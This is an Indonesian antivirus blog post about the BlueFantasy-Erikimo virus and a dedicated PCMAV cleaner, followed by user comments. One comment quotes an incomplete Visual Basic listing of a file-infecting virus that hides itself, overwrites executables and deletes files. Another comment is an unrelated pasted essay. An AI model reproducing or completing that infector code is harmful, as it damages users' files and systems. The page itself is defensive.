Home > Analisa Virus, Antivirus > PCMAV SE for BlueFantasy-Erikimo

PCMAV SE for BlueFantasy-Erikimo

BlueFantasy kini mengeluarkan varian terbarunya. PCMAV mengenalnya sebagai BlueFantasy-Erikimo. Pembuat virus lokal ini, yang ber-icon-kan mirip folder, sepertinya memang terus meningkatkan kemampuan programmingnya. Terbukti, dengan banyaknya laporan ke PC Media mengenai pengguna komputer yang telah terinfeksi oleh virus ini. Virus yang dibuat dengan Visual Basic dengan ukuran sebesar 40.960 bytes ini di-compile menggunakan metode P-Code.

Pesan dari pembuat virus

Ada yang unik dari virus ini. Seperti yang kita ketahui, program yang dibuat menggunakan Visual Basic 5/6 biasanya membutuhkan sebuah file runtime library yang biasa kita kenal dengan nama MSVBVM50.DLL atau MSVBVM60.DLL. Dan seperti yang kita ketahui juga, cara termudah untuk menghapus virus yang diprogram menggunakan Visual Basic adalah dengan cara me-rename file runtime library tersebut untuk sementara, dengan tujuan agar si virus tidak bisa jalan. Namun, hal tersebut tidak berlaku untuk virus ini. BlueFantasy-Erikimo memiliki file runtime library pribadi miliknya sendiri. File tersebut bernama “Thumbs .db“. File ini sebenarnya adalah file MSVBVM60.DLL asli milik Windows yang telah dimodifikasi oleh si pembuat virus ini. File “Thumbs .db” hadir satu paket bersama sang virus. Artinya, jika file “Thumbs .db” tidak ada, otomatis si virus pun tidak dapat berjalan.

BlueFantasy-Erikimo ini meng-hidden-kan setiap folder yang ia temui, lalu digantikan dengan duplikat dari dirinya sendiri. Sejak RC14, PCMAV baru mengenali satu jenis dari virus ini, namun ini tidak menutup kemungkinan dengan adanya varian lain di luar sana yang belum dilaporkan, mengingat penyebaran dari virus ini cukup luas.

Pesan dari virus ketika command prompt dicoba diaktifkan

Jika komputer Anda telah terinfeksi oleh virus ini, cukup gunakan PCMAV RC14 yang terdapat di Majalah PC Media 04/2007 atau RC terbaru. Walau begitu, kami juga menyediakan PCMAV Single Edition (SE) – Special Cleaner for BlueFantasy-Erikimo yang dapat Anda gunakan untuk mengatasi virus ini sampai ke akar-akarnya hingga tuntas. Silakan Anda periksa secara menyeluruh komputer Anda, namun sebelumnya jangan lupa untuk mematikan fasilitas System Restore dari Windows.

Jika PCMAV-SE ini tidak dapat mengenali virus BlueFantasy yang menghinggap di komputer Anda, silakan kirimkan contoh virus tersebut kepada kami untuk segera dibuatkan antinya.

Categories: Analisa Virus, Antivirus Tags:
  1. ada deh
    April 7th, 2007 at 10:31 | #1

    gua pake pcmav rc 14 udah cukup
    tapi kok gak bisa dicleanya
    apa memang yang kedeteksi cuman file virusnya doang
    SE nya bener gak nih

  2. Rudi
    April 7th, 2007 at 21:27 | #2

    ADuH… knp Virus BlueFantasy-Erikimo belum bisa iatasi oleh Pc mEdiA AV !!!!!!!!!!!!!!!!!!!!!!!!

  3. April 9th, 2007 at 02:38 | #3

    @ada deh: jika registry dan memory tidak terinfeksi, maka hanya tombol delete-lah yang aktif. artinya tidak ada yang di-clean. jika anda punya rc14, kami sarankan rc14 untuk mengatasinya.

    @rudi: sudahkah anda membaca readme.txt?

  4. anggi
    April 10th, 2007 at 14:32 | #4

    aku coba pake rc 14, virusnya sih kedeteksi, tp kok gk bisa di clean atau delete ya, cuma muncul tulisan G:\help.exe [Virus Suspected (BR) – Please submit this file to PC Media for further analysis.]

  5. inod
    April 10th, 2007 at 20:59 | #5

    humm,,leh tanya ga,,ini virus autorun ato ga,,,,,
    selama ini sih saya pake symantec corp. fine2 aja,,,enteng sih 🙂 and still until now for 5 years.
    pake yang laen pernah nyoba,,,tapi cm sesaat duang kaya nya ebatnya,,stelah itu,,loyo,,,yah permainan kali ya,,,
    btw,,PC Mav cukup membantu,,tapi dulu saya pernah,,kayaknya seih sering undetectable error kali klo digabung ma clamav,,,
    pake cleaner(tanpa ada clamav) nya bisa kedetect virus brontok, tapi klo digabung,,lewat dah tuh,,,
    terpaksa symantec wa turun tangan,,,, -.-”
    hihihi,,oiya,,btw alhamdulillah wa belum pernah ketemu virus indo yang autorun klo dicolok flashdisk,rata2 masih butuh bantuan tangan,,sehingga antivirus ga perlu dipake..manual ajah..
    tulung dunks klo ada list virus indo yang autodetect mau, taro di majalh,,
    hehe,,thx 🙂

  6. inod
    April 10th, 2007 at 21:01 | #6

    ups sori maksudnya list virus indo yang autorun..thx

  7. boo
    April 13th, 2007 at 00:45 | #7

    bang tolong saia
    bluefantasynya dah kedetek trus juga udah aku delete
    tapi knapa waktu start logon masih kluar
    message box kaya di atas
    contoh:surabaya in my birthday…..dst….
    plis tolong….butuh komputer buat ngerjain TA nihh

  8. dodit
    April 17th, 2007 at 11:57 | #8

    Download pcmav se bluefantasy error saat 90% … terima kasih atas perhatiannya ^_^

  9. April 17th, 2007 at 12:39 | #9

    TROJAN.POPUPER yg ada di kom gue koq gak ilang2 ? T_T padahal dah mke di pc media.. gue baca readmenya gak ad yg namanya TROJAN.POPUPER…

    TOlong

  10. tech said
    April 17th, 2007 at 19:31 | #10

    ko PCMAV-RTP kalo diidupin btw komputer gw henk ya,dh di coba di dua komputer tu!!!

  11. tech said
    April 17th, 2007 at 19:32 | #11

    ko PCMAV-RTP rc 14kalo diidupin btw komputer gw henk ya,dh di coba di dua komputer tu!!!

  12. Selamat
    April 19th, 2007 at 10:00 | #12

    setelah mumet 3 hari kesana kemari …
    dan baca artikel ini dengan seksama ….
    akhirnya tuntas ilang thu yang namanya Virus Blufantasi …
    terima kasih tuk PCMAV ….
    maju terus …..

  13. April 20th, 2007 at 14:30 | #13

    file word dan excel sy tdk bs dibk semua knp ya… stlh diclean sm pcmav filenya ngaco smua mhn infonya… trims.. slalu muncul confertion file…jd brbh ttl…trims..

  14. April 23rd, 2007 at 02:57 | #14

    da yang kenal ma FeeLCoMz.V2A ga? gue gak tau tu varian apa, n blm yakin jga tu virus pa gak, yang pasti dia gak mo di ilangin, gak detect di antivir manapun, termasuk pcmav 14..

  15. April 23rd, 2007 at 03:00 | #15

    alamat email pcmedia paan? gue mo kirim suspected virus, biar dianalisa ma yang brwajib, hee.. katanya sih pcmedia bisa bantu, kalo gak salah di reasme beta13 gitu, gue bingung mo kirim kemana?

    tolong ya,, caiyyo

  16. April 27th, 2007 at 23:20 | #16

    saya ingin update pcma yang baru

  17. Charles
    April 28th, 2007 at 09:54 | #17

    gw dah coba pake PCMAV SE bluefantasy-Erikimo, emang sih virusnya bisa kedetect semua and didelete, tapi waktu direstart lagi masih tetap muncul tuh 🙁 jadi harus mulai lagi dari awal scan virusnya… gimana yach solusinya?

  18. al misky
    April 28th, 2007 at 11:14 | #18

    halo semua,

    aku ada masalah dgn komputerku nih! kompieku kena virus, virusnya ciri2nya begini:

    1.aku cari2 di semua drive tidak ada file dgn ekstensi yg aneh2. file dgn .exe tidak aku temukan.
    2.folder options, run, msconfig, dxdiag masih bisa di buka. komptr jg tidak restart2 sendiri.
    3. ketahuannya kalo aku memasukkan file dalam bentuk folder ke flashdisk, folder itu langsung menggandakan diri di dalam folder itu.
    4.berkali-kali flashdiskku ku format ulang, aku masukkan file yang ada foldernya, juga begitu. pernah juga setelah ku format [flashdisku] aku langsung buat folder di dalam flashdisk juga langsung muncul. apa FD ku yang ada virusnya, ya?

    mohon bantuannya! thanks…

  19. petra
    April 28th, 2007 at 22:35 | #19

    gw pake PC MAV SE bluefantasy-erikimo,kedetek sih virusnya terus gw delete, tp pas d restart kq Puisi masih ada ma folder op-gw masih gak bs dibuka file hiden-nya,trs apa maksudnya sistem restore harus d matiin seh?..tolong d bantu ya PC MAV..THx

  20. April 29th, 2007 at 06:12 | #20

    saya ingin donwlod pcma bagaimana caranya

  21. Uj3
    May 1st, 2007 at 21:45 | #21

    Gmn ni pcmedia, gw dah coba donlod Clamav (Tclamav) Tp ng pernah berhasil. Tlng dong caranya? Thanks. MAJU TERUS PCMEDIA. SALUT BUAT VIRUS2 LoKaL.

  22. NR
    May 2nd, 2007 at 08:33 | #22

    Um, messagebox blueFansasy-3r1k1m0 nya mang ilang…
    tapi, koq masih banyak folder bertipe screen saver y dikomputer saya? pa ada virus lain???
    saya jadi bingung sendiri…
    btw, thanx a lot ye… 🙂

  23. May 2nd, 2007 at 18:56 | #23

    salam sukses

    pada saat pcmav di aktifkan disitu kok sudah ada virus yang terdeteksi/ virus signature:….tapi waktu ci scan dgn pcmav kok virusnya g ada?dan bluefantasy-erikimo kok ada yang g bisa di delete pada waktu di scan. n ada alternatif yang lain g buat ngilangin virus tersebut?q sampek pusing buat cari penangkalnya.

    thanks ya PCMAV semoga maju terus dan banyak suksesnya.

  24. andy mike
    May 6th, 2007 at 19:15 | #24

    haduh bluefantasy menggila………
    komputerku diserang habis2an…….
    udah pake 2 jenis antivirus tapi masi blm beres juga….
    file2 yang di hidden udah balik smwa tapi skrg kmputerku tambah lemot+kata2 mutiara pas mau log on masi ada….
    gmana nih????moga2 pake pcmav SE special for erikimo bisa ngobatin aminnnnnn….tapi kalo blm bisa gmana dunk?????

  25. Alpa
    May 7th, 2007 at 21:37 | #25

    kalo kena blue fantasy,udah di clean sama PCMAV perlu di atrrib dari DOS nya ga?berarrti semua drive perlu di atrrib.ada saran buat yang udah parah terinfeksi search and cleannya mending pake hardisk laen.kalo udah parah PCMAV nya ga dtect tu virus

  26. YSW
    May 13th, 2007 at 05:56 | #26

    aku pake PC MAV SE bluefantasy-erikimo tp koq tetep bandel ya virusnya ya???

  27. he he
    May 18th, 2007 at 08:58 | #27

    kmrn nih, baru aja.. aq bingung 1000 bhs gara2 nih virus.. pke avg g ke-scan.. trus ada tmn yg nyaranin pke pcmav.. aq download deh rc15.. bs sih ilang (kykna lho)
    tp koq rada gmn gtu, soalna ada file yg g bisa ke-scan ama nih antivirus..

  28. william
    June 3rd, 2007 at 14:10 | #28

    wah, gw baru cobna en semua bisa di delete tapi kurang 1 en katanya protected by other anti virus jadi ga bisa di delete, padahal nortonku dah ta mati in. trus gw delete filenya lsg ilang en ga ketemu di recyucle bin. di recycle bin dah gw delete all file trus tetep virusnya masih ada … ada pencerahannya ga ??

  29. Ivana
    June 4th, 2007 at 14:32 | #29

    lho. blue fantasy itu mnurut q virus gampang koq. kalian smua ndak perlu sampe bli2 PCMAV segala. cukup pke Kapersky. Dah gitu cukup pke update’an lama dah bisa koq detect + hapus. Nda usa ampe bli PCMAV. buang2 duid lahh.. Akakaka !!!

  30. Ivana
    June 4th, 2007 at 14:32 | #30

    lho. blue fantasy itu mnurut q virus gampang koq. kalian smua ndak perlu sampe bli2 PCMAV segala. cukup pke Kapersky. Dah gitu cukup pke update’an lama dah bisa koq detect + hapus. Nda usa ampe bli PCMAV. buang2 duid lahh.. Hihihi !!!

  31. Arnold
    June 4th, 2007 at 14:36 | #31

    betul2 itu.. ndak perlu sampe beli2 PCMAV koQ. Setuju koq gw ama pendapat me2 ivana. Hehehe… rugi rasanya kalian klo beli PCMAV. Cukup download kapersky ajah uda bisa KoQ. Gw dah coba. GRATIS LAGEE !!! ¨_”

  32. pujianto
    June 5th, 2007 at 18:38 | #32

    gwe malah curiga klo yg bikin virus aneh2 saat ini adalah PV MAV sendiri ??????

  33. pujianto
    June 5th, 2007 at 18:42 | #33

    sorry maksud gw PCMAV, gw pernah install PC MAV , trus bingung gmn cara un installnya??? akhirnya C: diinstal ulang, trus ganti pake avira anitvir gratisan, ternyata lumayan ampuh loq..
    orang indonesia ini banyak yg pinter2, tp cenderung ngancurin bangsa sendiri, heran??

  34. ridho
    June 5th, 2007 at 22:22 | #34

    setiap di scan pake PCMAV RC 14 belum selesai scan virus, komputer sudah mati duluan.kira-kira apa penyebanya mas.tolong dong blue fantasy nya juga tidak hilang-hilang…

  35. ridho
    June 5th, 2007 at 22:26 | #35

    anti virus apa lagi yang ampuh buat hilangin blue fantasy…

  36. June 8th, 2007 at 10:47 | #36

    Wah PCMAV SE ini ampuh banget`s, sebelumnya gue bingung abiz ngatasin virus ini, truz gue download PCMAV SE, ternyata, wih…..mantap ancur tuh virus. Thank`s buat PCMAV

  37. June 9th, 2007 at 10:32 | #37

    Koq PCMAV SEnya gak bisa di download, kalau bisa koq formatnya .file, mohon bantuannya

  38. gi9s
    June 12th, 2007 at 11:01 | #38

    Kasitau saya dunk cr hpus tu virs dgan cara sendiri?
    PCMav nya dah da ama saya!
    biar lebih grenk gt! ok….

  39. June 14th, 2007 at 16:00 | #39

    yes….PC MAVSE

  40. ryan
    June 22nd, 2007 at 18:36 | #40

    Virus dah terdeteksi TAPI….
    Kok..Puisi Ga Hilang dan Folder Option masih terganggu..
    Please Help Me mY Hero!!! PC MEDIA

  41. nana
    June 24th, 2007 at 11:12 | #41

    ada varian baru nih, mengifeksi file dokumen (baik .doc maupun rtf) dan juga menduplikasi dengan tambahan ‘s data dengan ukuran 44 kb, puisinya jadi ada kata-kata:
    1. Ketuhanan Yang Maha Esa
    2. Kemanusiaan yang tidak beradab
    3. Persatuan telah tiada
    4. Kerakyatan yang dipimpin oleh setan, iblis dan jin
    5. ………..

  42. ErikimoJancok
    June 27th, 2007 at 13:00 | #42

    yth Pak Admin… saya mau tanya,apakah PCMAV bisa dijalankan di Windows Vista?
    Komputersaya terinfeksi Bluefantasy dan menggunakan OS Vista.klo saya perhatikan virus ini lebih parah dampaknya di windows vista.
    jika pd XP Pesan puisi tampil berupa message box di Vista tampak pada halaman Logon setelah diklik OK layar berubah Hitam dan tidak tampak apa2 selain cursor mouse,tentu saja tidak bisa melakukan apa2 setelah masuk windows.Task Manager masih bisa tp tidak membantu.
    Bantuan dan Solusi sangat saya harapkan terimakasih

  43. Imbro
    August 24th, 2007 at 17:01 | #43

    Gile bener nih virus. Gue dibikin kelabakan cari anti virus nyang ampuh… puh… puh…
    Komputer kantor gue n komputer di rumah gue jadi amburadul folder2nya.
    Makacih yach buat nyang punya solusi

  44. Freon
    September 25th, 2007 at 17:41 | #44

    PCMAV ampuh untuk deteksi, menghapus virus dan mengembalikan file yang terinfeksi virus BlueFantasy. Tapi kok sekarang file yang saya hidden tidak dapat dilihat lagi (opsi “Show the hidden files” gak bisa aktif).
    mohon bantuannya untuk membantu masalah saya, berhubung banyak file yang sebelumnya saya hidden

  45. dhanang
    October 1st, 2007 at 08:57 | #45

    saya mau nanya nih. saya pernah benerin komputer temenku yg kena virus ini pake pcmav 18 dan hasilnya bisa. nah yang jadi pertanyaan gue, waktu gue benerin komputer temenku yang lain yg sama2 kena virus ini kok gak bisa padahal yang gue pake itu pcmav 19. padahal tampilan virusnya sama seperti yang dijelaskan pada website. apakah ini variannya yang lain dari blue fantasy atau bukan. temenku ini juga pake antivirus avg free edition. mohon penjelasannya

  46. SMS Spam By Paray-Hack
    October 1st, 2007 at 10:30 | #46

    Konsep, Politik dan Strategi Kebudayaan Indonesia

    IDENTITAS BUDAYA
    AKU DALAM BUDAYA LOKAL, NASIONAL, GLOBAL

    Prof. H. KMA M. Usop, M.A.

    Hidup Beradat : di mana kita bertempat, di situ kita beradat
    —Beloem bahadat, nilai Budaya Betang [Rumah Panjang] Dayak Kalteng

    Makalah ini mencoba memberikan suatu gambaran/ deskripsi tentang suatu tatanan interaksi dan integrasi jaringan nilai-nilai [yang mengatur kehidupan] lingkungan budaya lokal dengan nasionaldan global atau sebaliknya, di mana “aku” itu berwujud dalam jatidiri/identitas pribadai [kepribadian, integrated personality], identitas budaya lokal, identitas budaya nasional dan “identitas budaya global”. Juga menunjukkan bahwa suatu tatanan nilai budaya-lah [termasuk nilai-nilai keagamaan] yang mengandung kekuatan untuk mengintegrasikan [Alisjahbana : ”values as integrating forces”] sebagai suatu hikmah dari benturan-benturan budaya [clashes of civilization ] yang terjadi di dalam proses perkembangan masyarakat lokal, nasional dan global.

    Kebinekaan [pluralisme, kemajemukan, perbedaan-perbedaan] sudah merupakan realitas yang nyata. Bentuk-bentuk upaya sentralistik [ketunggalan] bermunculan silih berganti berbenturan dengan bentuk-bentuk desentralistik [kebinekaan], sehingga melahirkan bentuk-bentuk integratif seperti konsep-konsep otonomi, identitas budaya, demokrasi, keterbukaan [komunikasi], globalisasi, dsb. Proses interaksi dan integrasi di lingkungan nasional mencapai puncak benturannya pada keruntuhan Orde Baru, disusul reformasi dan demokratisasi, sehingga berwujud dalam amandemen-amandemen UUD ’45.
    Mayoritas bisa dominan dalam wajah budaya nasional, tetapi yang minoritas pun tetap tampil pada wajah tersebut, selain wajah tradisi dan wajah modern. Amandemen UUD ’45 memberikan otonomi budaya pada daerah-daerah/etnik-etnik di Indonesia. Di dalam suasana otonomi itu tetap berlangsung proses interaksi dan integrasi yang bersifat lokal dengan nasional [dipayungi oleh kerangka budaya nasional] dan global. Dalam suasana demokrasi dan otonomi itu tetap terjadi interaksi dan integrasi antara kekuatan-kekuatan yang berbeda-beda.
    Individu [sebagai objek dan subjek budaya] di mana pun juga mau tak mau dipengaruhi oleh proses budaya lokal [lokalisasi : identitas budaya lokal], nasionalisasi [identitas nasional] dan globalisasi [identitas global : individu yang dapat hidup di mana saja di muka bumi in]. Interaksi dan integrasi yang berkembang di dalam diri seseorang adalah suatu wujud kepribadiaannya dalam tahap-tahap perkembangan membentuk suatu ”kepribadian yang utuh” [integrated personality] yang dinamik. Kepribadian yang demikian pun akan berkembang terus/ berubah sesuai dengan lingkungan kehidupan di mana dia berada dan berapa jauh dia terbuka pada lingkungan-lingkungan komunikasi yang lebih luas. Individu “bukanlah katak di bawah tempurung”. Seseorang dapat bertolak dari [kerangka] budaya lokal, nasional maupun global atau sebaliknya, tergantung di mana dia berada.

    Nilai-nilai global a.l. : peaceful co-existence/ hidup berdampingan secara damai/ di mana bumi dipijak, di situ langit dijunjung/ di mana kita bertempat, di situ kita beradat, melestarikan lingkungan hidup [termasuk teknologinya yang tidak bebas nilai], HAM, berkembang terus. Benturan Irak dan Amerika Serikat menimbulkan suatu dilemma global : “kekerasan dilawan dengan kekerasan” atau “sengketa apapun harus diselesaikan secara damai” atau “senjata pemusnah harus dimusnahkan”, “apakah terorisme dan perang itu beradab [civilized] , apakah senjata nuklir itu pencegah [deterrent] atau pemusnah”. Sedikit banyaknya ada analogi atau kemiripan antara perkembangan global dan perkembangan nasional : ada benturan-benturan antara ideologi [nilai-nilai] sekuler modern dengan ideologi keagamaan dan ideologi kebangsaaan. Konflik/ benturan tertutup dapat menjadi konflik/ benturan terbuka. Apakah yang ditolak umat manusia itu sebenarnya adalah “kemusnahan massal” ? Apakah PBB [sebagai pengemban nilai-nilai /ideologi kemanusiaan] dan tokoh-tokoh global dari sejumlah negara berfungsi sebagai penengah untuk “menemukan suatu jalan tengah”.

    Dalam dunia yang mengglobal, maka harus tampil individu-individu [aku-aku] yang memiliki kepribadian utuh yang kualitasnya di atas rata-rata baik di pusat/nasional, di daerah-daerah maupun di dunia global. Apakah “aku-aku” itu yaitu tokoh-tokoh lokal [local genius], nasional dan global dapat merupakan suatu komuniti penengah [suatu “kita”], the small creative minority [Toynbee]/ minoritas kecil yang kreatif, yang akan menyelamatkan umat manusia dan peradaban-nya? Posisi demikian pun analog dengan posisi lokal dan nasional, posisi ”aku”, “kami” dan “kita”. Komuniti kreatif itu, sebagai suatu perwakilan “kita”, telah bermain juga di arena nasional. Melalui amandemen-amandemen UUD ’45 tentang kebudayaan, bahasa negara dan bahasa daerah, masyarakat adat, identitas budaya, HAM dan “lambang negara”, telah dikukuhkan *Ideologi Nasional Pancasila/ UUD ’45 sebagai suatu “kerangka budaya” [cultural framework]. Itu suatu “integrating forces” yang mempersatukan, merukunkan, mengintegrasikan, meredam/mengarahkan konflik-konflik tertutup agar tidak menjadi terbuka, mengakomodasi ideologi keagamaan dan ideologi sekuler modern, menuju suatu tahap perkembangan/ kemajuan yang berarti dalam membina dan mengembangan Adat Baru/Peradaban Indonesia Baru. Dengan demikian, Pancasila/UUD ’45 juga menjadi dasar budaya, selain sebagai dasar negara, ideologi negara dan sumber hukum.

    Palangka Raya, 22 Februari 2003

  47. Piwied
    November 6th, 2007 at 12:43 | #47

    Siang……………..

    aq dah pake PCMAV RC20 tapi kok virus bLueFantasy-Erikimo masih tetep ada ……..

    jadi sekarang komputer aq di format…………

    gimana neyh

  48. michael
    November 17th, 2007 at 06:28 | #48

    saya mau tanya, apa nama asli virus erikimo itu ketika di deteksi sama antivirus?
    terimakasih.

  49. 1337 krew
    November 24th, 2007 at 13:25 | #49

    komp gua kena blue fantasy erikimo tapi , pcmav rc20 gua uda deteksi dan “object was cleaned”
    tapi, pas komp gua restart, tuh virus masih ada……”Surabaya is my birthday….”

    Gmana NEH ???????????

  50. November 26th, 2007 at 04:30 | #50

    mo tanya klo mo ilangin virus ini dr flash disknya gmn ya?? flash disk udh diformat, masih tetep aja ada

  51. rado
    March 18th, 2008 at 13:06 | #51

    ada versi freenya gak..?

    thx

  52. harnaz
    March 22nd, 2008 at 17:57 | #52

    say kena virus bernama BlueFantasy-Erikimo.inf tapi saya mau donwload PCMAV Single Edition (SE) – Special Cleaner for BlueFantasy-Erikimo gak bisa dan saya sudah pake pcmav anti-virus1.1 update tidak terdeteksi

  53. Roycker
    March 23rd, 2008 at 20:20 | #53

    gw cuma titip pesen ama yg buat virus, ditunggu yg baru, yg ini mah ‘cemen’ & cari lg CW yg baru jgn cengeng!!!. tapi, nice try!!!!

  54. rangdiz
    April 11th, 2008 at 22:41 | #54

    Gw kena virus ini barusan, keknya varian baru. PCMAV 26 cmn bisa detect aja tp gak bisa clean gmana neh, control panel jd gak bisa d akses, system restore jg gak bs d akes

    help dunk

  55. May 20th, 2008 at 12:21 | #55

    dUw notebOokq kna erikimO jga…
    gmna neh.. mnA tUgas skOlah lgy nUmpuk…
    help dOnk…

  56. September 5th, 2008 at 10:01 | #56

    mau share nih…..
    gmn nangani virus k6wkwon2.exe
    pake apa ya antivirusnya
    so untuk virus yg notabene ………/win32…..

  57. October 23rd, 2008 at 15:41 | #57

    apa bisa dibasmi, kalau semua aplikasi (.EXE) dijangkiti. listing yg pernah saya lihat sebagian seperti ini:
    Private Declare Function GetCurrentProcessId Lib “kernel32” () As Long
    Private Declare Function RegisterServiceProcess Lib “kernel32” (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
    Private Declare Function OpenProcess Lib “kernel32” (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long
    Private Declare Function GetExitCodeProcess Lib “kernel32” (ByVal hProcess As Long, lpExitCode As Long) As Long
    Private Declare Function CloseHandle Lib “kernel32” (ByVal hObject As Long) As Long
    Sub Form_Load()
    On Error Resume Next
    Dim process As Long
    Dim cow12 As String
    process = GetCurrentProcessId()
    Call RegisterServiceProcess(process, RSP_SIMPLE_SERVICE)
    cow12 = “ZVful”
    cow1 = cow12 & “sw1Vkhoo”
    Call WOLUS
    wolu1 = App.EXEName
    If Right(App.Path, 1) “\” Then
    wolu2 = App.Path & “\”
    End If
    wolu2 = wolu2 & wolu1 & “.exe”
    If UCase(wolu2) = winpath & “\SYSTEM32\SYSTEMROOTS.EXE” Then
    WOLU = Command()
    For x = 1 To Len(WOLU)
    xyz = UCase(Mid(WOLU, x, 1))
    rangka = rangka + xyz
    If Right(rangka, 5) = “.EXE ” Then
    rangka = Left(rangka, Len(rangka) – 1)
    WOLUku = Right$(WOLU, Len(WOLU) – x)
    GoTo cek
    End If
    Next x
    cek:
    If UCase(Mid(rangka, 1, 16)) = UCase(propath) Then
    PROSESPF (rangka)
    GoTo okee
    End If
    If UCase(Mid(rangka, 1, 16)) UCase(propath) Then
    ff = FreeFile
    tgljam1 = FileDateTime(rangka)
    For w = 1 To Len(tgljam1)
    Scan = Mid(tgljam1, w, 1)
    If Scan = ” ” Then
    tgl1 = tgl1 + Scan
    jam1 = Mid(tgljam1, w + 1, Len(tgljam1) – w)
    GoTo stempel
    End If
    tgl1 = tgl1 + Scan
    Next w
    End If
    stempel:
    tgljam0 = Date$
    jam0 = Time$
    Date = tgl1
    Time = jam1
    Open rangka For Binary Access Read As ff
    Dim sebenarnya As String
    sebenarnya = Space(LOF(ff))
    Get #ff, 1, sebenarnya
    If UCase(Right(sebenarnya, 3)) = “DYS” Then
    Call KE_ASLINYA
    End If
    Close #ff
    Open wolu2 For Binary Access Read As #2
    Dim bobot As String
    bobot = Space(ukuranku)
    Get #2, 1, bobot
    Close #2
    Open rangka For Binary Access Write As ff
    Put #ff, 1, bobot
    Put #ff, ukuranku, sebenarnya
    Put #ff, LOF(ff) + 3, “DYS”
    Close #ff
    Call KE_ASLINYA
    Call LIBAS
    End If
    JANGKIT
    dstnya ….
    On Error Resume Next
    Kill files
    ff = FreeFile
    Open wolu2 For Binary Access Read As #ff
    Dim kodeku As String
    kodeku = Space(ukuranku)
    Get #ff, 1, kodeku
    Close
    Open winpath & files11teksnya For Binary Access Write As #ff
    Put #ff, 1, kodeku
    Put #ff, LOF(ff) + 3, “DYS”
    Close
    FileCopy winpath & files11teksnya, winpath & “\system32\SystemRoots.dll”
    Call KE_ASLINYA
    dstnya…